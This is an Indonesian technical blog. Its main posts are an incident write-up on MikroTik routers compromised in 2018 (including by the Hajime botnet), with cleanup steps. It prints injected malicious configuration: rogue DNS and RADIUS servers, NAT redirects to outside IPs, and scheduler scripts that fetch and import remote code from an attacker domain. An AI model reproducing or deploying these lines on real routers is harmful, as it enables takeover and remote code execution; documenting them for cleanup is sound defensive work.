Mikrotik : Wabah september 2018

email : ariyaandro@gmail.com


belum genap 3 bulan penulis membahas impact serangan mikrotik kapan lalu di link berikut

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

 

Mikrotik : Wabah Oktober 2018

sudah ada yang lain yang belum jelas serangan seperti apa ini, yang jelas mem block koneksi IP public kembali dan mengisolasi akses dari beberapa IP. untungnya login mikrotik tidak di tutup total masih mau login via mac address antar mikrotik.

berikut beberapa capture config yang di obrak-abrik wabah mikrotik, yang belum sempat cek script config satu-satu… hehehhehhe

serangan pertama pertengahan september, tak diketahui apakah di sumber yang sama atau bagimana. ada pergerakan filter firewall yang aneh. akses ippublic terhalagi, untuk via MAC address masih bisa.

serengan berlanjut di akhir bulan september, yang semakin brutal hingga membuat script dan upload download ke link tak jelas arah lintang nya. dan yang ini tak tahu juga apah dari sumber yang sama di serangaan sebelumnnya.

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :


/ip dns
set servers=”94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.20\
8.208.141″

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminproxy disabled=yes dst-port=\
80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=dst-nat chain=dst-nat disabled=yes dst-port=3333 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=8888 protocol=tcp \
to-addresses=149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat disabled=yes dst-port=14444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=8008 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat disabled=yes dst-port=4444 protocol=tcp \
to-addresses=209.239.112.96 to-ports=4444

/ip proxy
set enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/system note
set note=”DEVICE HACKED – ACCOUNT ftp HAD UNSAFE PASSWORD”

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235


sedangkan pada menu file disk mikrotik ada file aneh berikut

yang salah satunya yaitu mikrotik.php dengan isi berikut

:do { /system scheduler set U3 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U3 not found”}

:do { /system scheduler set U4 name=”U5″ on-event=”/tool fetch url=http://ciskotik.com/poll/b8c07b87-7239-4acd-8012-92e7 mode=http dst-path=7xe7z\r\n/import 7xe7z” } on-error={ :put “U4 not found”}

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Iklan

Celebrate the WordPress 10th Anniversary on Sept 19

sumber image : internet (thanks)

akhirnya sudah cukup lama bermain blog ini

dan tak disangka hingga sekarang masih main dengan blog ini dan tetap setia menyampaikan infomasi dari yang terbatas hingga berbagi IT yang lebih bermanfaat.

maaf bila ada salah kata selama membuat posting di sini, sekali lagi maaf penulis juga manusia yang masih banyak kekurangannya.

berikut post test awal,

https://pmdkduaonline.wordpress.com/2008/09/19/blog-pmdk207-teknik-informatika-unesa/

dari kuliah hingga sibuk kerja seperti sekarang, syukur dapat banyak hal tentang pengalaman menulis. walau tak banyak.

terima kasih bagi yang telah membaca dengan baik dan membaginya dengan baik pula.

troubleshoot : Install IonCube Loader – Centos 7.4

email : ariyaandro@gmail.com

kali ini penulis akan share sedikit, tentang sebuah loader untuk web server pada linux. ya walau awal cobanya langsung jalan namun untuk pelengkap beberapa artikel lainnya yang mungkin ada yang bermasalah saat install ioncube ini bisa membantu dalam troubleshoot nya bila tutorial sebelah tak bisa jalan dengan baik, atau mengurangi anggapan negatif bahwa teori berbanding jauh dengan praktik itu tak sepenuhnya benar.

ok dalam install ioncube pada linux web server khususnya lebih diperhatikan step/langkah point yang perlu diperhatikan yaitu

  1. download ioncube loader
  2. extrak dan copas module ioncube
  3. load/panggil dari service PHP

itulah kurang lebih check point yang perlu diperhatikan, selebihnya pakai pemahaman sendiri dalam pembagian langkah utama juga bebas…. hehhehehe

  1. web server siap
    diharapkan sebelum test pasang ioncube web server linux sudah berjalan normal sesuai keinginan sudah…
  2. baca beberapa artikel isntall ioncube
    silahkan baca beberapa artikel sebelah untuk membandingkan cara2 installasi ioncube dengan benar. dimana artikel disini hanya untuk memperhatikan segi troubleshoot yang tak terduga dan tak selalu di jelaskan pada artikel lainnya.
  3. download ioncube
    disini bisa saja download langsung dari terminal linux dengan wget atau semacamnya. atau downlaod terpisah di luar (windows). hasil downloadnya cukup ambil module misal “ioncube_loader_lin_5.6.so” saja yang di ambil dan di upoad ke web server linux.
    tentunya sudah memastikan dulu seperti cek versi php yang sedang jalan dan adanya service ftp untuk layanan upload ke linux (tool upload seperti filezilla)
    dan file “loader-wizard.php” dari extrakan tadi yang perlu di upload atau dijalankan di web server (dengan sebelumnya buat folder sendiri baiknya untuk memanggil file tersebut misal \var\www\html\ioncube\loader-wizard.php), dimana nanti dilajut dengan memanggilnya pada browser [ipserver]\ioncube\loader-wizard.php
  4. load/panggil dari service PHP
    PENTING !!! disini artikel pentingnya kawan… sibak baik2 ya.
    setelah download paket ioncube loader, silahkan buka filenya. masukkan loader-wizard.php pada lokasi root web server. ini cara muda sih install ioncube dengan wizard yang ada, yg sudah pro linux mungkin tak perlu ini dah langsung jalanin saja. ini penulis load dalam root folder web server seperti berikut hasilnya, perhatikan owner foldernya hingga permission foldernya itu 775. waktu penulis coba sebenarnya lagi di posisi mode root, bukan posisi user seperti gambar dibawah ini (namanya juga menambilkan.. 😀 )

    lalu upload file loader-wizard.php ke folder ioncube hingga seperti ini,
    untuk kepemilikan sepertinya bisa bebas, tak harus root atau apache.
    dan jika di panggil dari browser akan ada proses inisialisasi untuk kroscek kompabilitas dari web server dan akan menampilkan petunjuk install ioncube yang sudah disesuaikan. contoh hasil prosesnya seperti berikut (browser [ipserver]\ioncube\loader-wizard.php)
    sumber dari artikel sebelah…
    lalu bila inisialisasi berhasil akan diberikan sedikit intruksi lagi untuk cara load model ioncube pada service php yang lebih direkomendasikan.
    sumber dari sebelah juga… yang tentunya akan sedikit berbeda dengan yang di demo kan pada gambar di atas.
    langsung lanjut dengan klik point ke 3 pada “save this 20-ioncube.ini file” (penulis mendapati hasil inisialisasinya dengan file 00-ioncube.ini) dan copy-paste ke folder yang di sarankan. file dari penulis download dan upload ke web server, baru copas.
    oh ya lupa, penulis menggunakan php 5.6 yang diperolah dari package fedora, jadi posisi hasil insyaller php 5.6 ini agak berbeda. dan penulis letakkan pada folder berikut (maaf tak capture hasil inisialisasi ioncube yang dikerjakan penulis)
    maka tinggal melanjut restart service web server saja. dan buka kembali browser [ipserver]\ioncube\loader-wizard.php
    maka akan diperoleh hasil seperti berikut,

    selamat itu tandanya sudah terinstall dengan benar, namun baiknya di test lebih pasti. sayangnya dalam paket loadernya ioncube ini tak ada file yang seperti test.php yang berisi encrypt, mau coba pun harus download tools ioncube encrypt nya versi trial/beli dan konversi file dulu. dah penulis sediakan di point berikutnya.
  5. Test fungsi ioncube
    PENTING !!! disini artikel pentingnya berikutnya kawan… sibak baik2 ya.
    penulis mendapat info dari artikel sebelah, sebenarnya ada web app yang menggunakan fitur ioncube ini dalam file php nya. nah penulis dapat ini tak semua harus dicoba, yang penting proses loader ioncube nya terlihat berjalan.
    seperti biasa diawal, download file php ini. lalu upload semua ke folder tersendiri dalam root web server dan panggil. hasilnya php running tuh lihat…
    contoh gambar file php yg sudah di load ke web server.

    walau dalam file index.php sudah menjadi bahasa tumbuh2an hehhehehehhe… :D..

    contoh file yang sudah ter-encrypt oleh ioncube

begitulah kurang lebihnya, semoga bermanfaat.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Statistik Blog Sekarang – agustus 2018

email : ariyaandro@gmail.com

berikut gambaran statistic blog ini, …

sebagai acuan juga bagi yang ingin beriklan. 🙂

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Statistik Blog Sekarang – juli 2018

email : ariyaandro@gmail.com

berikut gambaran statistic blog ini, …

sebagai acuan juga bagi yang ingin beriklan. 🙂

statistikjuli2018link2statistikjuli2018link

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Backup : hasil coba backup OS dengan Veeam dan Acronis (personal/home) yang free

email : ariyaandro@gmail.com

untuk bahasan backup secara teknis bisa melihat post sebelumnya.

https://pmdkduaonline.wordpress.com/2018/04/24/artian-backup-dari-sisi-infrastruktur-teknis/

berikut penulis mencoba bagaimana hasilnya dan prosesnya untuk salah satu aplikasi backup khusus untuk OS (walau di dalamnya juga ada jenis backup file atau partisi harddisk). apliaksi yang di coba yaitu veeam endpoint (free) dan acronis true image 2018 (trial).

langsung saja disini lebih menjelaskan hasil proses teknisnya, yang menurut penulis ini tidak afektif bila di gunakan waktu OS sedang running. dimana waktunya lebih lama (namun wajar, karena ini os sedang running) dan proses backupnya langsung bisa buffer hingga di atas kapasitas disk yang termakan OS. penulis waktu mencobanya benar2 menguras read-write HDD dan waktunya mungkin bisa seharian.

berikut disk win OS yang ada, kira2 sudah termakan 50’an GB….

drive C akan di backup menggunakan acronis dulu, dimana lebih direkomendasikan backup ke luar HDD local seperti file sharing lainnya atau NAS.

jika diperhatikan sekilas saja pada hasil backupnya, terihat pada size tertentu akan disambung ke file backup lagi dan backup yang terkalkulasi oleh acronis yaitu kisaran 100 GB padahal bisa terlihat bahwa drive widnows nya hanya sedang memankan 50’an GB. sedangkan waktu penulis mencoba acronis yang under Hirren bootabe saja (tentunya saat windows tak aktif) menghasilkan satu file backup full kisaran 27’an GB saja.

kesimpulan berhubung ini punya dukungan dukungan cloud drive acronis tersendiri dan edisi 2018 sudah support malware ransome protect tentu jadi pertimbangan khusus tersendiri bagi yang membutuhkannnya.

 

sedangkan untuk veeam endpoint free ini juga memiliki hasil backup OS windows yang besar pula, masih dalam proses 7% saja sudah menghasilkan size backup 16’an GB. misal hasil sementara itu dikalikan 10x lipat maka menghasilkan 160’an GB, sedangkan drive C yang termiliki berapa apalagi dibandingkan nilai kalkulaksi hasil backup acronis. setting pada aplikasi ini, selalu diminta confing ulang semisal hanya ingin melihat kembali backup yang ada itu diarahkan ke mana (coba click menu configure backup setiap membuka awal apliaksi ini). serta waktu proses backup ke NAS tersebut, mengalami putus dan tentunya pengulangan dilakuakn dari awal proses backupnya.

kesimpulan aplikasi ini masih terlallu besar dibanding proses file backup dari acronis, dan belum mendukung fitur khusus seperti yang diulas pada acronis di atas.

secara keseluruhan, ini lebih efektif waktu backupnya tidak dilakukan di saat aktif menggunakan windows, percobaan di atas telihat bahwa tak ada apliaksi yang sedang dijalankan.

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

email : ariyaandro@gmail.com

Dear rekan teknis,

apakah jaringan anda tidak dapat diakses dari luar kantor ? selamat penulis juga sedang mengalaminya dalam semingguan ini, dan baru tersadar bahwa itu serangan masif terhadap khususnya router mikrotik ke seluruh dunia menurut beberapa sumber yang ada. namun sepertinya masalah ini sudah masif sejak maret 2018 hingga sekarang…

bila ip public (khususnya yang static) yang sedang menempel pada mikrotik sepertinya akan ikut terkena efeknya. sehingga bila ada koneksi dari luar kantor akan terkesan putus atau tak menemukan ip public, atau yang sempat terlihat penulis bahwa beberapa koneksi luar masih bisa masuk tersambung ke kantor tapi lebih kebanyakan terputus (tak bisa di ping).

langsung cek lah mikrotiknya, dilihat sekilas untungnya tak langsung serangan total terhadap mikrotik. dari 3an router yang ada hanya satu sepertinya yang full ter-inject setting mikrotiknya (moga aja begitu) dengan mambandingkan 3 router yang ada terlihat sepertinya tahap awal serangan akan membuat rule baru pada firewall (atau sepertinya ada yang sudah terhapus total rule firewall filter nya) yang terlihat seperti berikut :

gambar 1 : contoh rule firewall hajime botnet
sumber : https://forum.mikrotik.com/viewtopic.php?t=134965

itulah rule yang terlihat bisa sudah mulai terinfeksi, yang sebelumnya penulis kira ada penambahan rule dari provider. tersadar disaat ada masalah persis seperti di atas dan langsung tangan menggeliat cepat seperti ada info kebakaran gedung…

jika diperhatikan impact yang ada maka awalnya memang koneksi luar kan sulit masuk terhubung ke ip public kantor, namun akses webfig nya juga tertutup hingga service www port 80.

gambar 2 : contoh hajime lainnya

pada gambar 2 di atas terlihat sama rule nya dengan gambar 1, dan terlihat keterangan yang diberikan hampir sama semua terlebih ada kode BTC (mungkin bitcoin).

dari gambar 2 itu sebenarnya sekitar capture dari 3 harian yang lalu dan waktu di cek ulang ternyata sudah imbas hingga merubah nama identify name mikrotik menjadi HACKED , selebihnya belum menemukan lagi dampak rule yang ditimbulkannya.

berikut beberapa hal yang perlu diperhatikan awal untuk dikoreksi pada rule router mikrotik :

  1. jika router anda sering di check point / maintain di waktu tertentu pada file backup, maka langsung restore saja ke point restore pada tanggal yang dikira tak ada perubahan dan pas kondisi aman jaringan kantor.
  2. jika ingin membandingkan atau mencari rule mana saja yang aneh, maka backup dan bandungkan dengan backup config mikrotik sebelumnya saja. lalu lakukan penyesuaian ke semula. cara ini lakukan bila sebelumnya ada rule yang cukup banyak yang ada atau yang diterapkan pada mikrotik dan lupa backup nya.
  3. awalnya langsung delete/disable 6 rule yang ada seperti contoh gambar 1 dan 2 di atas
  4. pada firewall periksa pada address list, bila ada allow-ip maka itu hasil dari hajime pada rule filter, hapus/disable semua kecuali pada rule anda sendiri ada penamaan sama.
  5. periksalah ip DNS pada mikrotik, lakukan penyesuaian kembali jika berubah
    sumber : https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html
  6. cek dan atur clock jika tak sesuai setting semua yang terpakai, pemulis mendapati bahwa auto time zone status NO. seperti contoh script berikut
    ________________________________________________________________________________

    /system clock
    
    set time-zone-autodetect=no

    ________________________________________________________________________________

  7. periksa radius mikrotik, bila ada yang aneh hapus/disable semua yang ada dan cek juga setting incoming nya (jika tak perlu maka radius incoming set accept NO saja). yang penulis peroleh dari capture config yang terinfeksi routernya ada serperti berikut
    ________________________________________________________________________________

    /radius
    
    add address=47.75.230.175 secret=test service=ppp
    
    add address=47.75.230.175 secret=test service=ppp
    
    add address=47.75.230.175 secret=test service=ppp
    
    /radius incoming
    
    set accept=yes

    ________________________________________________________________________________

  8. periksa service yang ada, dan sesuaikan dengan kebutuhan semula. ubah saja portnya jika perlu, dikarenakan menurut sumber yang ada ini salah satu sebab bug webfig mikrotik.
  9. system log pada mikrotik kembalikan enable semua (yang awal terifeksi ada yang belum di disable oleh hajime nya)
  10. periksalah apakah ada script yang terlihat aneh dan cek schedule script nya mirkotik
  11. pada systemm note router ada terselip kata2 intrupsi, penulis menyadari ketika sedang koreksi rule config dan membuktikan waktu buka new terminal
    ________________________________________________________________________________

    /system note
    
    set note="The security flaw for Hajime is closed by the firewall. Please updat\
    
    e RouterOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
    
    3nUgsdqQawiMLC1bUGDZWHowix1"

    ________________________________________________________________________________

  12. periksa system identity, tahap infeksi akhir yang penulis lihat terlihat akan berubah ke HACKED. bila terjadi maka tak usah panik, langsung saja ganti namanya kembali ke semula
  13. buat user baru yang full access, lalu disable user admin mikrotik atau ganti password admin
  14. selebihnya silahkan melakukan tahap2 penyesuaian kembali dan membuat rule penghalau bila masih di khawatirkan terinfeksi.
  15. trakhir coba finishing dengan upgrade RouterOS jika dibutuhkan sesuai rekomendasi sumber lainnya ke 6.41.x atau terbaru

serangan wabah mikrotik ini berlanjut kembali, mimin kaget lagi deh….

Mikrotik : Wabah september 2018

Mikrotik : Wabah Oktober 2018

 

TIPS !

mungkin bisa dibuat sebuah schedule script untuk clear semua firewall dan add rule minimum yang diperlukan, lalu di mode schedule per startup router mikrotik. agar lebih simple dan cepat recovery network dalam masalah seperti ini.

sumber yang ada :

https://www.dodiventuraz.net/2018/05/cara-mengatasi-serangan-hajime-botnet-dan-chimay-red-exploit-di-router-mikrotik.html

https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/

https://blog.radware.com/security/2018/03/mikrotik-routeros-based-botnet/

https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

 

%d blogger menyukai ini: